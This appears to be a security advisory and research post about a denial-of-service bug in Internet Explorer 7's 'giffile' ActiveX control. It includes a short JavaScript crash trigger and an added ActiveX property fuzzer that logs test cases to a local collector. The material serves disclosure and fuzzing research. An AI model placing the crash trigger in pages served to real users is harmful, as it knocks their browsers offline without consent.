Internet Explorer 7 ActiveX bgColor property NULL pointer dereference (DoS)

Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other

CVSS Base Score: 7.8/10
Impact Subscore: 6.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Complete

I thought that after the success of MoBB last year, fuzzing browsers would be pointless, since all vendors would take care of the easily-found bugs before a release. It turns out that I was wrong. I ran a very simple ActiveX fuzzer against Vista and found a NULL pointer dereference bug in no time. The vulnerable ActiveX control is on the pre-approved list in IE7, which makes the bug easy to trigger with no security warnings and no user interaction. Try this:

    <script language="JavaScript">
    var obj = new ActiveXObject("giffile");  // control is on IE7's pre-approved list
    obj.bgColor;                             // reading the property dereferences NULL
    </script>

MSRC said that this is a reliability bug and not a security issue, and it will be fixed at some point in the future. I agree that DoS bugs against IE are not very important (as long as skape doesn't drop any more vulns like MS06-051 :-), but it's interesting that such a simple bug in such an obvious part of the IE7 attack surface was not discovered and fixed before the release.

See the full technical details at or.html

More about fuzzers and ActiveX at

Alexander Sotirov
Determina Security Research
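To make the "very simple ActiveX fuzzer" concrete, here is an added example of what such a harness looks like; it is not Sotirov's fuzzer or any code from the original post. It instantiates each ProgID, then reads and writes a small dictionary of property names against it. The property list, the probe values and the collector URL are constructed assumptions. The essential design point is that a NULL pointer dereference takes the whole iexplore.exe process down, so the test case must be persisted before the access runs, not after; the last line the collector received is the crash. It is written in ES3 syntax so the same file runs in IE7 and in a modern engine, where a stand-in factory can be passed instead of ActiveXObject.

```javascript
// Added example, not code from the original post: skeleton of a simple ActiveX
// property fuzzer. Written in ES3 syntax so it runs in IE7 and in Node.
// PROBE_PROPERTIES and PROBE_VALUES are constructed samples, not real
// fuzzing dictionaries.

var PROBE_PROPERTIES = ["bgColor", "src", "width", "height", "readyState"];

// Values pushed through each setter: type confusions, boundary integers and a
// long string. Kept short here; a real dictionary would be much larger.
var PROBE_VALUES = [null, undefined, 0, -1, 0x7fffffff, "", new Array(1025).join("A")];

// Runs the property probes and returns a summary. `factory(progId)` must
// return a live object or throw; `log(msg)` is called BEFORE every access,
// because a NULL pointer dereference kills the whole browser process and
// nothing after the access will run. The last persisted line is the crashing
// test case.
function fuzzActiveX(factory, progIds, properties, values, log) {
  var results = { created: [], createFailed: [], exceptions: [], accesses: 0 };
  for (var i = 0; i < progIds.length; i++) {
    var progId = progIds[i];
    var obj;
    try {
      obj = factory(progId);
    } catch (e) {
      results.createFailed.push(progId);   // not installed, or not creatable from script
      continue;
    }
    results.created.push(progId);
    for (var j = 0; j < properties.length; j++) {
      var prop = properties[j];
      log(progId + " get " + prop);
      try {
        void obj[prop];                    // the read is the interesting part
        results.accesses++;
      } catch (e) {
        // A script exception is not a crash: record it and keep going.
        results.exceptions.push({ progId: progId, op: "get", prop: prop, error: String(e) });
      }
      for (var k = 0; k < values.length; k++) {
        log(progId + " set " + prop + " = " + String(values[k]));
        try {
          obj[prop] = values[k];
          results.accesses++;
        } catch (e) {
          results.exceptions.push({ progId: progId, op: "set", prop: prop, error: String(e) });
        }
      }
    }
  }
  return results;
}

// Logger for a real IE run: ship each test case to a collector with a
// synchronous request so it has left the process before the access executes.
// In-page logging (document.title, a DOM node) dies with the process.
// The collector URL is an assumption.
function makeSyncHttpLogger(collectorUrl) {
  return function (msg) {
    var xhr = new XMLHttpRequest();        // native object in IE7
    xhr.open("GET", collectorUrl + "?testcase=" + encodeURIComponent(msg), false);
    xhr.send(null);
  };
}

// Entry point for IE: only runs where ActiveXObject exists. The first probe
// is "giffile get bgColor", the access from the post.
if (typeof ActiveXObject !== "undefined") {
  fuzzActiveX(
    function (id) { return new ActiveXObject(id); },
    ["giffile"],                           // extend with other pre-approved ProgIDs
    PROBE_PROPERTIES, PROBE_VALUES,
    makeSyncHttpLogger("http://localhost:8000/log"));  // assumed local collector
}
```

Loaded in IE7 with a trivial HTTP listener on the collector port, a run against the real control stops after the collector sees `giffile get bgColor`, because the read is the NULL dereference. Outside IE, the factory argument lets the same harness be exercised against a stand-in object, which is how the logic can be checked without a crashing browser.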

